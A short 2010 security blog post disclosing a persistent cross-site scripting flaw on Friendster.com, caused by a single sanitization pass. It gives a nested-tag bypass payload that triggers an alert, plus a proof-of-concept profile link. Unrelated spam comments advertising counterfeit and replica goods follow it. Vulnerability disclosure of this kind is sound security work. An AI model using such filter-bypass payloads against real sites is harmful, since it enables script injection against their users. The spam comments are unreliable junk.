skip to main | skip to sidebar

XSS - Cross-Site Scripting

And Other Web Related Deception

This site is soon to be deprecated by http://www.johnleitch.net

Thursday, May 6, 2010

Friendster.com Persistent XSS

Only one sanitization pass is performed on user submited data.

Exploit: <<z>script>alert(0)<<z>/script>

PoC: http://profiles.friendster.com/31202727

Posted by John Leitch at 7:00 PM

Labels: friendster.com, hacking, persistent xss, security, social networking, type 2 xss

4 comments:

chenlinaMay 31, 2016 at 5:42 PM
chenlina20160601
michael kors outlet
ray ban wayfarer
pandora jewelry
ray ban wayfarer
adidas running shoes
nike store
ray bans
fake watches
nike roshe run
oakley sunglasses
authentic louis vuitton handbags
nike basketball shoes
michael kors purses
louis vuitton bags
air jordans
michael kors handbags
fitflops sale clearance
polo ralph lauren
adidas nmd
designer handbags
oakley sunglasses outlet
nike trainers uk
michael kors outlet
jordan 11 concord
nike huarache
juicy couture
replica watches
hollister clothing
polo ralph lauren outlet
air force 1
ralph lauren outlet
hollister
michael kors outlet
louis vuitton outlet
tod's shoes
insanity workout
louis vuitton handbags
cheap air jordans
kate spade
coach outlet
as
ReplyDelete
Replies
yanmaneeeSeptember 25, 2019 at 8:15 AM
golden goose superstar
nike air max 270
polo ralph lauren
louboutin shoes
lebron 13
supreme clothing
russell westbrook shoes
golden goose sneakers
golden goose sneakers
jordan store
ReplyDelete
Replies
toshaslAugust 1, 2022 at 9:17 AM
her latest blog bag replica high quality hop over to here buy replica bags online continue reading this have a peek at this web-site
ReplyDelete
Replies
AnonymousAugust 25, 2022 at 6:24 PM
c8s51t7m21 m4g80v9m88 b3n24h6a00 z1v73r9o64 i5b84f0o06 w6v88s7n53
ReplyDelete
Replies

Newer Post Older Post Home

Subscribe to: Post Comments (Atom)

About Me

John Leitch

View my complete profile

Blog Archive

▼ 2010 (71)
- ► July (28)
- ► June (2)
- ▼ May (27)
- ► April (7)
- ► March (7)

► 2009 (20)
- ► November (2)
- ► October (1)
- ► September (6)
- ► August (2)
- ► June (3)
- ► May (6)

Blog Catalog

Computer Security Blogs - BlogCatalog Blog Directory

Blogflux

Blog Flux Local - Michigan

Blogged

Programming Blog Directory

Blogville